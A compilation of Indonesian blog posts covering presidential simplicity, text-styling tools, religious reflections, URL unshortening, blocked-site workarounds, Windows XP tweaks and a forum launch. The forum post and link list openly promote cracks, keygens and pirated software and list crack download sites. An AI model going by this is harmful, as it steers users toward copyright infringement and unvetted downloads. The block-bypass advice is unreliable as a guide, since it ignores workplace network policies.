8. Satu hal yang membuat kagum staf kepresidenan adalah tas yg selalu dibawa sang presiden tiap hari selalu berisikan sarapan roti isi atau roti keju yang disiapkan istrinya dan memakannya dengan gembira, ia juga menghentikan kebiasaan menyediakan makanan yang dikhususkan untuk presiden.

9. Hal lain yang ia ubah adalah kebijakan Pesawat Terbang Kepresidenan, ia mengubahnya menjadi pesawat kargo sehingga dapat menghemat pajak masyarakat dan untuk dirinya, ia meminta terbang dengan pesawat terbang biasa dengan kelas ekonomi.

10. Ia kerap mengadakan rapat dengan menteri2 nya untuk mendapatkan info tentang kegiatan dan efisiensi yang sdh dilakukan, dan ia memotong protokoler istana sehingga menteri2 nya dapat masuk langsung ke ruangannya tanpa ada hambatan. Ia juga menghentikan kebiasaan upacara2 seperti karpet merah, sesi foto, atau publikasi pribadi, atau hal2 spt itu saat mengunjungi berbagai tempat di negaranya.

11. Saat harus menginap di hotel, ia meminta diberikan kamar tanpa tempat tidur yg tidak terlalu besar karena ia tidak suka tidur di atas kasur, tetapi lebih suka tidur di lantai beralaskan karpet dan selimut. Apakah perilaku tersebut merendahkan posisi presiden? Presiden Iran tidur di ruang tamu rumahnya sesudah lepas dari pengawal2nya yg selalu mengikuti kemanapun ia pergi. Menurut koran Wifaq, foto2 yg diambil oleh adiknya tersebut, kemudian dipublikasikan oleh media masa di seluruh dunia, termasuk amerika.

12. Sepanjang sholat, ia tidak duduk di baris paling muka

13. Bahkan ketika suara azan berkumandang, ia langsung mengerjakan sholat dimanapun ia berada meskipun hanya beralaskan karpet biasa 14. baru-baru ini dia baru saja mempunyai Hajatan Besar Yaitu Menikahkan Puteranya. Tapi pernikahan putra Presiden ini hanya layaknya pernikahan kaum Buruh. Semoga di negeri ini akan (terlahir) dan semakin banyak terlahir para pemimpin yang sangat mencintai dan dicintai seluruh rakyatnya... pemimpin yg amanah, sederhana, tulus mengabdi kepada rakyat, tidak menyakiti hati rakyat, selalu peduli, mengutamakan dan memperjuangkan kepentingan rakyatnya melebihi kepentingan dirinya, keluarganya, golongan dan kelompoknya, amiiiin...

Berikut foto foto yang menggambarkan kesederhanaan sang presiden:

Foto Presiden Iran:
sangat menghormati wanita
Pernikahan sederhana untuk anaknya
Acara pernikahan anak ahmadinejad
Shalat dimanapun ia berada
Shalat berjamaah
Meja makan Presiden Ahmadinejad
Kamar tidur Presiden
Ruang Kerja
Jamuan Makan kepada Presiden Morales
Tanpa protokoler kepresidenan yang sangat ketat
Penulis: Wahyu Setyo Wibowo

23 [Tools] Menambah efek arsiran pada teks

Satu lagi tools untuk manipulasi teks agar terlihat indah, unik dan tentunya beda dari biasanya. Saya sendiri bingung mau memberi nama apa pada tools ini. Orang-orang sih menyebutnya C̷r̷o̷s̷s̷ ̷H̷a̷t̷c̷h̷i̷n̷g̷ ̷T̷e̷x̷t̷, tapi saya lebih suka menyebutnya teks dengan efek arsiran. whatever lah, anda bisa memberi nama sesuka hati anda. Sebelumnya saya sudah mempublikasikan 2 tools untuk manipulasi teks yaitu Membuat tulisan terbalik dan alay teks generator yang merupakan tools untuk mengubah kalimat biasa menjadi kalimat alay gaya ABG :D Sekarang kita coba dengan tools yang saya jelaskan di atas:

C̷r̷o̷s̷s̷ ̷H̷a̷t̷c̷h̷i̷n̷g̷ ̷T̷e̷x̷t̷






Tools keren lain:
  1. Chat facebook dengan huruf berwarna
  2. Alay Teks Generator
  3. Tulisan terbalik
  4. SMS Gratis

19 [tools] Alay teks generator

Tiap zaman memiliki ciri khasnya sendiri sendiri, jika anak muda zaman dahulu khas dengan celana cutbray dan potongan rambut culunnya maka anak muda (baca: ABG) sekarang khas dengan bahasa Al4y-nya. Gak percaya?? coba deh baca status facebook anak anak SMP, SMA bahkan mahasiswa dan orang yang udah nenek nenek pun banyak yang menggunakan bahasa alay yang nyebelin ini..wkwkwk surim dah dunia.

Nah jika anda juga pengen bergaya ala ABG alay, saya ada tools yang dapat mengubah kalimat biasa menjadi kalimat alay. Nama toolsnya alay generator..ha ha .. :)) =)) silahkan dicoba:






Tulis teks yang akan dibuat menjadi Alay di bawah ini :


Teks Normal    Teks ALAY
  
HuRUf bEsAr keCil      
P4k3 4n9k4 D0n9      
Disngkt-sngkt biar pndk      
     
 Tools keren lain:
  1. Chat facebook dengan huruf warna
  2. Alay Teks Generator
  3. Tulisan terbalik
  4. SMS Gratis

thanks to: alaygenerator.co.cc

1 Kenapa Kita harus Takut ?!

kenapa kita meski takut pada masa depan yang sudah "pasti"... smua jatah kita sudah tertulis di lauful mahfudz, tidak ada yang akan tertukar atau salah, jadi tidak ada yang perlu kita takutkan tentang masa depan kita.

Kita siapkan dan jalani saja sunatullah (hukum sebab akibat) nya dengan sebaik-baiknya, karena takdir Allah tidak akan menyalahi sunatullah, semua berjalan diatas sunatullah NYA.

Menikmati tiap kejadian dengan rasa bahagia, senang, baik sangka, optimis, kreatif, dan lain-lain. Buanglah segala ketakutan, minder, rasa tidak PD dan atau apapun yang buruk yang bersarang di fikiran dan perasaan kita tentang masa depan karena itu hanya lah kotoran dan sampah yang akan menghambat dan memperberat langkah kita.

Tiap diri manusia sudah di desain oleh Allah sesuai ujian dan rintangan yang akan ia hadapi di dunia ini, jadi kemampuan kita jauh diatas smua ujian, cobaan, rintangan atau apapun yg kita menganggapnya sebagai hambatan.

Kita hanya butuh keyakinan dan kreativitas yang terus terjaga agar smua ujian dapat di hadapi dengan sikap terbaik kita. Insya Allah semua di dunia ini tidak ada yang terlalu sulit, karena desain kemampuan kita diatas semua takdir yang akan kita hadapi, semua tergantung pada keyakinan dan kreativitas kita untuk mengolah semua ujian, rintangan, tantangan tersebut.

Apalagi Allah selalu bersama kita, semakin ringan dan mudah saja hidup kita, di manja dengan segala pertolongan dari sang penolong yg serba Maha...semua kembali pada diri kita...

Sebuah renungan yang saya ambil dari catatan sahabat sekaligus seorang kakak yang saya hormati Wahyu Setyo Wibowo

31 [tools] Membuat tulisan terbalik

˙uıɐl lɐısos uɐƃuıɹɐɾ nɐʇɐ ǝɔɐdsʎɯ 'ɹǝʇʇıʍʇ 'ʞooqǝɔɐɟ snʇɐʇs ıp ɐʎɐƃɹǝq ɹɐpǝʞǝs nɐʇɐ 'ƃolq\qǝʍ uɐɯɐlɐɥ ɥɐpuıɹǝdɯǝɯ ʞnʇun ɐʎuuɐʞɐunƃƃuǝɯ ʇɐdɐp ɐpuɐ ˙ʞılɐqɹǝʇ uɐsılnʇ uɐʞlısɐɥƃuǝɯ ʞnʇun uɐʞɐunƃıp ıuı ɐuɐɥɹǝpǝs slooʇ

Pusing juga yah baca tulisan di atas. Coba baca dari bawah, meskipun masih agak kesulitan saya yakin sekarang anda bisa membacanya. Kurang lebih bunyinya seperti ini:
"Tools sederhana ini digunakan untuk menghasilkan tulisan terbalik. Anda dapat menggunakannya untuk memperindah halaman web/blog, atau sekedar bergaya di status facebook, twitter, myspace atau jaringan sosial lain."
Dalam novel "the da vinci code", tulisan terbalik seperti ini dijadikan sebuah teka teki sebagai petunjuk tempat harta karun. Sedangkan dalam jejaring sosial seperti facebook, twitter etc tulisan kayak gini dapat dimanfaatkan untuk menambah kebingungan orang yang membaca status kita, ha ha.

Trus bagaimana membuatnya? sepertinya butuh waktu dan kesabaran jika kita ingin membuat tulisan terbalik secara manual.

Sesuai bunyi tulisan terbalik di atas, di bawah ini ada sebuah tools sederhana yang dapat merubah tulisan biasa menjadi tulisan terbalik. silahkan dicoba.

Membuat Tulisan Terbalik


Tulisan Asli:

Tulisan Terbalik:
Powered by Finderonly

Tools keren lain:
  1. Chat facebook dengan huruf warna
  2. Alay Teks Generator
  3. Tulisan terbalik
  4. SMS Gratis
  5. Mengarsir teks

4 TTS Online Klikedukasi pindah tempat

Dua TTS versi awal bisa dimainkan di facebook dan di sini, sedangkan sisanya dan pengembangan selanjutnya sengaja saya pindahkan ke blog khusus yaitu di tts-online.blogspot.com Alasannya biar lebih tertata, lebih fokus dan lebih enak pas maeninnya tidak terganggu dengan tulisan tulisan gak jelas kayak gini..ha ha. :p

TTS Online klikedukasi atau biasa saya singkat TTSOKE, sampai tulisan ini dibuat sudah sampai versi ke 7. Pada versi awal tampilannya masih acak acakan, maksudnya bentuk persilangan katanya asal asalan alias tidak simetris. Mulai versi ketiga dan seterusnya saya mencoba desain tts yang lebih elegen dan rapi, meskipun sambil nyontek nyontek dikit he he..

Untuk versi ke enam dan ke tujuh selain bisa dimainkan secara online, juga tersedia ttsoke versi pdf dan bisa anda download untuk dikerjakan secara offline. So bagi yang masih kesulitan untuk membuka ttsoke versi online, anda bisa mencicipi tts versi pdfnya. ho ho ho

Untuk mencoba ttsoke langsung aja meluncur kesitu http://tts-online.blogspot.com

-- Semoga terhibur :) --

1 Sosok kesederhanaan sang raja

Pemimpin agung ini tampil dengan kesederhanaannya. Beliau menghentikan untanya. Seluruh perhatian, pandangan mata, simakan telinga, semuanya terpusat kepada sosoknya. Ia adalah raja.

Allah telah berkenan menaruh di depannya kunci perbendaharaan dunia. Tetapi beliau lebih memilih cara hidup yang sama sekali berbeda dengan kelaziman para raja dan penguasa yang pernah ada sebelumnya.

Tempat tinggalnya bukan istana melainkan Rumah Sangat Sederhana. Kepalanya tidak bermahkota. Pundak dan dadanya tidak bersematkan tanda pangkat dan lambang kebesaran dunia.

Bahkan meskipun sangat mampu, beliau tidak pernah memakai kain sutera. Tidak pernah tidur di atas kasur yang empuk, karena lebih memilih tikar ilalang sebagai alas.

Beliau adalah seorang sosok manusia yang malam-malam harinya diisi dengan dzikir dan tafakkur. Berdzikir, mengingat Allah dan bertafakkur, merenungkan ayat-ayat Ilahi baik yang tersurat maupun yang tersirat.

Beliau adalah seorang ummi alias tidak mengenal aksara namun segenap penghuni bumi ini telah diajarinya. Beliau adalah seorang sosok manusia yang siang harinya disarati dengan pergulatan kehidupan ummat yang dipimpinnya.

Beliau seorang sosok manusia yang mempunyai kekuatan dan pengaruh, baik terhadap orang awam maupun cerdik pandai. Wajahnya menyiratkan sikap lemah lembut, ksataria sekaligus cerdas. Sehingga siapa pun yang berhubungan dengan beliau, menaruh hormat dan cinta.

Ditengoknya orang sakit tanpa pandang kelas sosial. Diterimanya undangan seorang budak yang mengundangnya makan di gubuknya. Dijahitnya sendiri pakaiannya yang koyak. Yang tidak pernah berpaling sebelum orang lain berpaling. Yang tangannya senang memberi. Dan lidahnya sangat terpercaya.

Beliau adalah sosok manusia yang sangat sayang pada anak-anak. Yang perkataannya tidak pernah melukai orang lain. Yang diutus untuk menjadi rahmat.

Beliau adalah seorang yang berwajah tampan, berjanggut bersih. Rambutnya yang ikal panjang tersisir rapi di bawah sorban putih. Raut muka bercahaya, sorot mata tajam tapi teduh. Badannya pun kekar, berdada bidang, berkulit putih kemerah-merahan. Kala itu usia baru saja melewati enam puluhan.

Siapakah seorang sosok manusia yang luar biasa itu? Siapa lagi kalau bukan seorang sosok manusia tercinta, panutan umat, yaitu Muhammad Rasulullah SAW, tokoh teladan hidup.

Sesungguhnya telah ada bagi kamu sekalian pada diri Rasulullah itu Uswatun Hasanah (teladan hidup yang baik) bagi siapa saja yang mengharapkan keridlaan Allah.

Dikutip dari:
http://oase.kompas.com/read/2011/11/05/21275972/Spirit.dari.Peristiwa.Haji.Wada

Gambaran sosok sang teladan di atas merupakan peristiwa yang terjadi ketika Rasulullah SAW hendak menunaikan ibadah haji wada, yang merupakan ibadah haji perpisahan sebelum beliau wafat.

Kesederhanaan Rasulullah SAW tersebut, sepertinya tidak pernah kita jumpai pada masa sekarang ini. Dimana para pemimpin sibuk memperbesar perutnya sendiri dan memperindah pakaiannya tanpa mempedulikan rakyatnya kelaparan. Tidak selesai sampai disitu, bahkan pemimpin sekarang tak segan segan merampas hak rakyat miskin demi memenuhi ambisinya. Semoga Allah mengetuk hati pemimpin kita ini.

Hari raya qurban merupakan cara Allah mengingatkan manusia tentang pentingnya kepedulian pada sesama, berbagi itu indah, berbagi itu berkah.
Selamat hari raya Idul Adha (10 Dzul-Hijjah 1432)

12 Mengintip link asli dibalik URL pendek

URL pendek yang saya maksud adalah link url yang dihasilkan oleh situs layanan pemendek URL seperti adf.ly goo.gl bit.ly tinyurl.com dan masih banyak lagi. Sebagai contoh link saya yang panjang seperti ini http://tts.klikedukasi.com/2011/10/teka-teki-silang-buat-para-jomblo-5.html bisa diperpendek dengan salah satu layanan pemendek url di atas menjadi seperti ini http://adf.ly/3SF09.

Lebih simple memang, lebih mudah dihapalkan juga. Akan tetapi lain ceritanya jika dibalik url yang telah diperpendek tadi ternyata mengandung sebuah link yang akan mengantarkan anda pada situs yang tidak diinginkan atau istilahnya link jebakan betmen. hmmmm pasti jengkel juga kan?

Ada beberapa cara untuk mengetahui link asli dibalik URL pendek tersebut. Cara yang akan saya jelaskan di bawah hanya berlaku untuk pemendek url adf.ly goo.gl bit.ly dan tinyurl.com saja. Untuk pemendek url lain seperti fb.me is.gd clicky.me bisa memanfaatkan tools dari situs penyedia layanan pemanjang URL seperti longurl.org.

1. adf.ly >> kebetulan saya belum menemukan cara manual untuk mengetahui link asli dari adf.ly ini. Mungkin bagi yang sudah tahu bisa dishare di sini. Khusus untuk adf.ly biasanya saya menggunakan tools khusus disitu

2. goo.gl >> bisa dengan cara manual yaitu dengan menambahkan tanda + di belakang url. Contoh url http://goo.gl/yDoZq tambahkan simbol + sehingga menjadi http://goo.gl/yDoZq+ atau anda bisa menggunakan alternatif lain yaitu dengan menambahkan .info di belakang link sehingga menjadi seperti ini http://goo.gl/yDoZq.info

3.  bit.ly >> caranya hampir sama seperti nomer 2 dengan menambahkan simbol + dibagian belakang url. Contoh: http://bit.ly/ss7LXa ditambahkan tanda + menjadi seperti ini http://bit.ly/ss7LXa+

4. tinyurl.com >> Untuk tinyurl agak berbeda sedikit dalam cara penulisan syntaxnya. Caranya yaitu dengan menuliskan preview setelah http:// contoh: http://tinyurl.com/3ganq7a menjadi http://preview.tinyurl.com/3ganq7a

-semoga bermanfaat- 
Referensi lain:
http://repo.antihackerlink.or.id/news.php?extend.24.3

2 Forum gosip klikedukasi

Mengambil slogan "Semua masalah akan terasa ringan jika kita bekerjasama untuk memecahkannya". Klikedukasi kini memiliki forum untuk sharing atau sekedar ngobrol. Saya mencoba memadukan antara hitamnya dunia hacking dan pendidikan. Image seorang hacker dewasa ini sungguh memprihatinkan, hacker dan aktifitas hackingnya cenderung diartikan ke dalam tindakan kriminal dunia cyber. Padahal sangat bertolak belakang dengan kenyataan yang saya lihat dan rasakan sendiri, setelah beberapa lama bergaul dengan mereka yang menyukai dunia hacking. Justru dari mereka lah dunia internet ini dibangun dan mereka juga lah para aktifis kreatif yang senantiasa menghidupkan dunia maya tanpa mengharapkan pamrih. Harusnya kita berterima kasih pada mereka, bukan malah men-judge mereka sebagai kriminal. Seperti kata manifesto dari salah satu komunitas underground Indonesia kurang lebih seperti ini "jika anda bertemu mereka, yakinlah bahwa anda sedang berhadapan dengan kaum intelektual yang kreatif dan jenius".

Dari dasar inilah saya mencoba menggabungkan antara edukasi dan hacking menjadi sebuah forum yang terpadu. Forum klikedukasi baru diluncurkan beberapa hari yang lalu, dan alhamdulillah sambutan dari temen temen juga cukup bagus. Sementara ini saya dan beberapa temen yang ikut mengurusi forum, menyediakan beberapa sub forum, diantaranya:

1.Perkenalan
Bagi yang baru gabung, diharapkan membuat thread perkenalan disini. Tujuannya biar kita saling kenal dan menambah suasana kekeluargaan.

2.The Lounge
Tempat gosip klikedukasi, di forum ini bebas untuk posting topik apapun sebatas tidak bersinggungan dengan SARA (Suku, Ras, dan Agama), dan pornografi tentunya. he he

3. Hacking: baru ada satu sub forum
* Belajar hacking untuk pemula
hacking, web sceurity dan permasalahan keamanan lain yang berhubungan dengan dunia cyber

4. Sastra: ada dua sub forum yaitu

* Novel, Cerpen, Puisi
Silahkan posting puisi, cerpen atau novel kalian disini.

* Belajar menulis
tips dan trik tentang belajar menulis

5.Ilmu sains
Diskusi tentang sains bilogi, fisika, kimia, matematika sampai pada bioteknologi dan teknologi terbaru produk dari ilmu sains

6. Edukasi

* Pendidikan formal
Semua hal yang berhubungan dengan pendidikan secara formal. Mulai dari teori pembelajaran, perangkat pengajaran, sampai media pembelajarannya

**Media pembelajaran
Semua hal mengenai media pembelajaran, teknik pembelajaran dan metode
pengajaran dapat diposting disini
**Perangkat pembelajaran
Diskusi mengenai perengkat pembelajaran seperti silabus, program tahunan,
program semester, RPP etc

* Pendidikan Non Formal
Topik pendidikan bebas yang penting masih dalam batasan edukatif.

7. Bajakan (hmmm, mari kita bajak, pelajari dan buat program yang lebih hebat)

* Cara curang
Berbagi tips dan trik curang, cheat games, crack, keygen serial number etc

* Share software bajakan
Punya software bagus ? share disini

* Share ebook
share ebook gratisan maupun ebook gretongan disini


Sementara baru seperti itu, sambil jalan sambil kita perbaiki sedikit demi sedikit. Mohon dukungannya bagi temen temen.

7 10 Smiley terbaru shoutbox klikedukasi

Sebelumnya shoutbox klikedukasi sengaja saya nonaktifkan, sekarang shoutbox ini telah kembali aktif dengan tambahan 10 smiley. berikut kesepuluh smiley tersebut beserta kodenya. cekidot:


Smilies Listing

Smiley Kode Smiley Kode
:hehe  
:p
 :bingung 

:malu

:lewat
 :capedeh 
:ngacir
:dead
:piss
 :ngakak 

[close window]

18 Buka Situs yang di blokir part 2

Melangkapi tulisannya om banditozz disini, saya akan mencoba share beberapa trik untuk membuka situs yang di blokir.

PURA PURA Translate
Ikuti langkah langkah berikut:
1. Buka alamat http://translate.google.co.id/?hl=id&tab=wT
2. Pada bagian kotak terjemahan kita ketikan alamat situs yang diblokir.
3. Lalu klik alamat situs tersebut.

CACHE GOOGLE
Membuka situs yang diblokir dengan menggunakan cache google merupakan salah satu trik favorit saya, simple dan langsung ketujuan he he. caranya adalah:
1. Misalkan situs yang terblokir http://www.facebook.com
2. Lalu buka google.com
3. Ketikan cache:http://www.facebook.com di kotak search google
4. Lalu klik alamat tersebut
Mudah bukan.
MODIFIKASI FILE HOSTS
Berikut caranya :
- Sebelum melakukan trik ini jangan lupa backup file hosts terlebih dahulu, hal ini bertujuan untuk mengurangi sekecil mungkin resiko kerusakan jika terjadi kesalahan . Ok lanjut
- klik start->all programs->accessories,
- klik kanan pada notepad
- klik run as administrator
- pada notepad, klik file->open
- buka folder : C:\Windows\System32\drivers\etc
- pilih All Files, bukan Text Documents
- klik hosts
- silahkan tambahkan baris ip dan host yang diinginkan
- Tambahkan smua dns static yang dimaksud.
Misalkan saya menggunakan
80.239.151.231 db1.rapidshare.com
80.239.151.232 db2.rapidshare.com
80.239.151.233 db3.rapidshare.com
80.239.151.234 db4.rapidshare.com
80.239.151.235 db5.rapidshare.com
80.239.151.253 games.rapidshare.com
80.239.151.251 images.rapidshare.com
Maaf untuk DNS static sengaja saya batasi karena terlalu panjang .
-Simpan perubahan tersebut, setelah itu kita bisa membuka browser kembali.

ANONYMOUS BROWSING
Kali ini kita akan menggunakan web proxy untuk mencoba membuka situs yang diblokir oleh admin jaringan kita. Web proxy ini dapat dimanfaatkan terutama bagi anda yang terhubung pada jaringan LAN (lokal) dan terdapat proxy didalamnya, Sehingga memudahkan anda dalam membuka situs target.

Anonymous proxy sangat membantu terutama dijaringan yang banyak dikantor, kampus, karena sudah ada proxy lokal yang memblokir situs tertentu. Salah satu yang menyediakan free anonymous adalah: http://anonymouse.org/anonwww.html

Cara mengunakan sangat mudah
-buka alamat http://anonymouse.org/anonwww.html di browser
-ketikan alamat website yang terbelokir dikolom yang tersedia.
-Lalu klik Surf Anonymously.

Situs lain yang menyediakan free web proxy antara lain:
www.megaproxy.com/freesurf/
www.hidemyass.com
www.Youhide.com
www.saintproxy.com
www.proxeey.com
www.stealthy.us
www.atunnel.com
www.sitesurf.net
Situs itu sangat dibutuhkan bila salah satu free web proxy tidak dapat dibuka dan kita masih memiliki alternatif yang lain

CGI PROXY
Cgi proxy adalah proxy yang memiliki kemampuan untuk menyimpan cookies. pengertian selengkapnya bisa anda cari sendiri di sini.

Contoh situs penyedia CGI Proxy
www.tools.rosinstrument.com/cgi-proxy.htm
www.anonsurf.biz
www.xrox.info
www.torproxy.net
www.myamigos.in
Untuk cara menggunakan hampir sama dengan anonymous browsing

PROXY INTERNET DOWNLOAD MANAGER

Pemakaian proxy tidak hanya untuk browser tetapi ada software downloader seperti IDM juga menyediakan opsi proxy ini. Cara menggunakan proxy pada idm sebagai berikut:
-Dalam menu pilih options
-Dalam kotak dialog internet download manager configuration, klik menu tab Proxy
-Beri tanda cek list pada Use HTTP Proxy dan masukan nilai proxy berserta nilai portnya.
-Klik OK

URL HACKING
Untuk trik yang satu ini saya sendiri belum tahu pasti namanya, biar agak keren kita namakan saja URL Hacking ..he he. Sesuai dengan namanya, kita hanya mengotak atik URL pada address bar.

-Misalkan situs target kita adalah http://www.facebook.com. Kita hanya perlu menambahkan huruf  's' aja menjadi https://www.facebook.com.

-Dengan menambahkan .nyud.net:8090/ misal http://www.facebook.com berubah menjadi http://www.facebook.com.nyud.net:8090/

-Dengan mengganti alamat situs dengan ip address. Loh kan gua gak tahu IP situsnya om, he he. Untuk mengetahui ip address suatu situs bisa menggunakan situs http://www.robtex.com atau dengan cmd dgn ping nama situs target. Misalkan yang diblokir http://www.facebook.com lalu kita ganti dengan ip address http://69.171.224.42

++++GOOD LUCK++++

Update Artikel dari Grup Klikedukasi di Facebook:
Penulis Artikel ini:
Fands Lov
| Facebook    

26 Mempercepat Kinerja Windows XP SP3

Windows XP meskipun sudah terbilang veteran untuk ukuran sebuah sistem operasi namun masih banyak peminatnya. Berikut ini ada beberapa trik untuk mempercepat kinerja Windows XP SP3 yang orang bilang sedikit tambun, berikut triknya :

1. Matikan System restore
System restore bisa bermanfaat jika komputer bermasalah, akan tetapi semua restore point yg disimpan bisa memakan ruangan yg cukup besar di harddisk. System restore membebani karena selalu memonitor sistem, dengan mendisable system restore maka sebagian resource bisa dialokasikan untuk hal yg lain.
Ikuti langkah langkah di bawah:
1. Buka Control Panel
2. Klik Performance and Maintenance
3. Klik System
4. Klik System Restore tab
5. Klik ‘Turn off System Restore on All Drives’
6. Klik ‘Ok’
2. Defrag Pagefile
Salah satu cara terbaik untuk melakukan ini adalah untuk menciptakan sebuah partisi yang terpisah pada hard drive hanya untuk file halaman, sehingga tidak bisa dipengaruhi oleh penggunaan disk normal. Cara lain untuk menjaga pagefile defragmented adalah dengan menjalankan PageDefrag. Aplikasi ini sedikit dingin dapat digunakan untuk defrag pagefile dan juga dapat diatur untuk defrag pada setiap pagefile di PC
1. Download Ultimate Defrag (bisa di search di google)
2. Running Defragment sampai selasai 100%
3. Reboot Komputer
3. Mempercepat akses Folder
Jika anda memiliki banyak folder dan subdirectories, maka akses ke Direktory2 Windows XP terasa sangat berat. Dengan mengupdate time stamp di registry, yaitu last access update untuk semua sub directory. Proceed with caution. Ikuti langkah berikut :
1. Start>Run>regedit
2. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contr ol\FileSystem
3. Klik kanan di bagian yg kan (cari area yg kosong), lalu pilih ‘DWORD Value’
4. Bikin DWORD Value dengan nama ‘NtfsDisableLastAccessUpdate’
5. Klik kanan pada value baru terus pilih ‘Modify’
6. Ubah data menjadi ’1
7. Klik ‘OK’

4. Menonaktifkan Microsoft System Sounds
Secara default MS sound systems membuat komputer berbunyi/bersuara ketika booting awal, shutdown, error, dll. Skenario suara windows jelas-jelas membuat komputer lebih lambat (terutama dalam waktu shutdown dan booting awal), untuk me-non-aktifkan silahkan ikuti langkah berikut:

1. Buka Control Panel
2. Klik Sounds and Audio Devices
3. Klik tab Sounds
4. Pilih “No Sounds” dari Sound Scheme
5. Klik “No”
7. Klik “Apply”
8. Klik “OK”
5. Mempercepat waktu Boot
Fitur yg lumayan asik dari Windows XP adalah kemampuan untuk mendefrag ketika ada dalam proses booting. Boot Defrag pada prinsipnya adalah menata file-file yg relevan dengan booting secara berurutan. Secara default fitur ini telah diaktifkan pada beberapa Build Windows, tapi beberapa build windows tidak, ada baiknya kalo kita cross check terhadap fitur yg satu ini.

1. Start Menu>Run
2. Regedit
3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction
4. Cari Enable dibagian kanan regedit
5. Klik Modify
6. Pilih Y to enable
7. Reboot
Tambahan: Bootvis juga bisa dicoba, untuk memangkas waktu boot dengan manuver yg manis.

6. Mempercepat Performa Swapfile
Jika anda memiliki RAM lebih besar dari 256MB bisa dibilang tweaking yg ini akan membuat sistem anda berjalan lebih cepat. Tweaking ini pada dasarnya PC kita mengunakan setiap byte dari memori fisik yg terpasang di komputer kita. Langkah langkahnya:

1. Start>Run
2. msconfig.exe>ok
3. Klik tab System.ini
4. Klik tanda plus pada tab 386enh
5. Klik kotak new kemudian ketik ConservativeSwapfileUsage=1
6. Klik OK
7. Restart
7. Mempercepat Loading Windows Menu
Tweak ini adalah tweaking fav saya, karena akan membuat komputer kita terasa lebih cepat. Tweaking ini membuang waktu delay ketika kita mengklik menu dan windows XP menampakkan Menu.
1. Start>Run
2. Regedit>Ok
3. “HKEY_CURRENT_USER\Control Panel\Desktop\”
4. Pilih/Sorot MenuShowDelay
5. Klik kanan dan pilih Modify
6. Ketik angka “100". Angka 50-150 adalah kisaran yg baik, bisa disesuaikan dengan Mood anda

8. Mempercepat Loading Program.
Tweaking ini bisa berjalan untuk sebagian besar program. Jika program tidak mau loading seperti yg diharapkan, silahkan aja dikembalikan ke setting semula.
1. Klik kanan pada icon/shortcut yg berkaitan dengan program.
2. properties
3. Pada kotak ‘target’, tambahkan ‘ /prefetch:1' diakhir kalimat.
4. Klik “Ok”
gampang kan, Program akan loading lebih cepat.

9. Mempercepat Shutdown Windows XP.
Tweaking ini mengurangi waktu tunggu secara otomatis ketika windows sudah menerima instruksi untuk shutdown.
1. Start>Run ‘Regedit’>OK
2. ‘HKEY_CURRENT_USER\Control Panel\Desktop\’
3. Sorot ‘WaitToKillAppTimeout’
4. Klik kanan dan pilih modify
5. Ubah value menjadi ’1000' Klik ‘OK’
6. Sorot ‘HungAppTimeout’
7. Ubah value menjadi ’1000' Klik ‘OK’
8. ‘HKEY_USERS\.DEFAULT\Control Panel\Desktop’ sorot WaitToKillAppTimeout’
9. Klik kanan dan pilih modify. Ubah value ke ’1000' Klik ‘OK’
10. ‘HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contr ol\’ sorot WaitToKillServiceTimeout
11. Klik kanan dan pilih modify. Ubah value menjadi ’1000' Klik ‘OK’

Selamat Mencoba, Semoga Berhasil.

Update Artikel dari Grup Klikedukasi di Facebook:
Penulis Artikel ini:
Fands Lov
| Facebook    

2 Daftar referensi situs penting

Setelah Sebelumnya saia membuat daftar situs buat belajar disini yang notabene situs situs tersebut mengarah ke dunia komputer terutama belajar web programming dan dunia hacking. Sekarang Klikedukasi merilis daftar situs situs penting sebagai referensi kita mengarungi samudera ilmu yang sangat luas ini. List website ini merupakan hasil sumbangan dari salah satu anggota forum diskusi klikedukasi di facebook "Fands Lov"

Cekidot gan:

DAFTAR SITUS PENGETAHUAN VIRUS/TROJAN


Wikipedia http://www.wikipedia.com/
http://www.vaksin.com/
http://www.acehforum.or.id​/
http://www.altalavista.com​/
http://www.altalacista.com
http://www.hackfix.org/
http://www.click-now.net/
http://www.megasecurity.or​g/info/mIRC.txt
http://www.frame4.com/cont​ent/files/Trojan_reversing​.txt
http://directory.google.co​m/Top/Computers/security/A​nti_Virus/Trojans/

CRACK | SOFTWARE | DOWNLOAD | TORRENT

http://www.crackfind.com/
http://www.anycracks.net/
http://www.CIMTeam.org/
http://www.newcracks.net/
http://www.9down.com/
http://www.Webkade.ir/
http://www.downarchive.com​/
http://www.dasofts.com/
http://www.lighttek.com/

ABBYY FINEREADER


http://go.abbyy.com/?Produ​ct=FineReader&Version=9.0.​0.882&Edition=PE&Part=5501​1&Language=1033&Target=Abb​yyHome


http://go.abbyy.com/?Produ​ct=FineReader&Version=9.0.​0.882&Edition=PE&Part=5501​1&Language=1033&Target=Che​ckUpdate

ACRONIS DISK DIRECTOR

http://www.acronis.com/
http://www.acronis.com/hom​ecomputing/download/diskdi​rector/

ALCOHOL SOFT
http://www.alcohol-soft.co​m/

CCLEANER
http://www.ccleaner.com/up​date/?v=2.11.636&l=1033
http://www.ccleaner.com/he​lp/?v=2.11.636&l=1033

ICON COOLSTUDIO
http://www.iconcool.com/
http://www.iconcool.net/
http://www.buddy-icons.com​/
http://graphics-converter-​pro.com/
http://www.iconcool.com/up​grade.htm
http://www.iconcool.com/fa​q.htm

FRUITYLOOPS STUDIO
http://www.flstudio.com/
http://www.flstudio.com/di​agnostic
http://tutorials.flstudio.​com/
http://www.ezgenerator.com​/LP/fl2ezgen.html
http://www.image-line.com/
http://www.deckadance.com/
http://www.mda-vst.com/
http://www.text2speech.com​/
http://www.sytrus.com/

JAVA | JCREATOR | JDK | JRE | JAVA SE
http://www.jcreator.com/
http://www.javasun.com/

KAMUS | SPEECH
http://www.coyee.com/
http://www.lzesoftware.com​/

AHEAD NERO
http://www.nero.com/ena/su​pport-nero9.html

QUICK ALL AUDIO CONVERTER
http://www.goldzsoft.com/

MICROSOFT UPDATE | DOWNLOAD CENTER
http://www.microsoft.com/d​ownloads/Search.aspx?displ​aylang=en
http://www.microsoft.com/w​indows/windowsmedia/player​/download/download.aspx
http://www.microsoft.com/d​ownloads/details.aspx?Fami​lyID=10cc340b-f857-4a14-83​f5-25634c3bf043&DisplayLan​g=en

MOTOGP
http://www.thq.com/
http://www.motogpthegame.c​om/07

Visual Task Tips
http://www.visualtasktips.​com/
http://www.intuimage.com/

WINAMP
http://www.winamp.com/

WINRAR
http://www.rarlab.com/
http://www.rarlab.com/them​es.htm

XAMPP
http://www.apachefriends.o​rg/en/xampp-windows.html

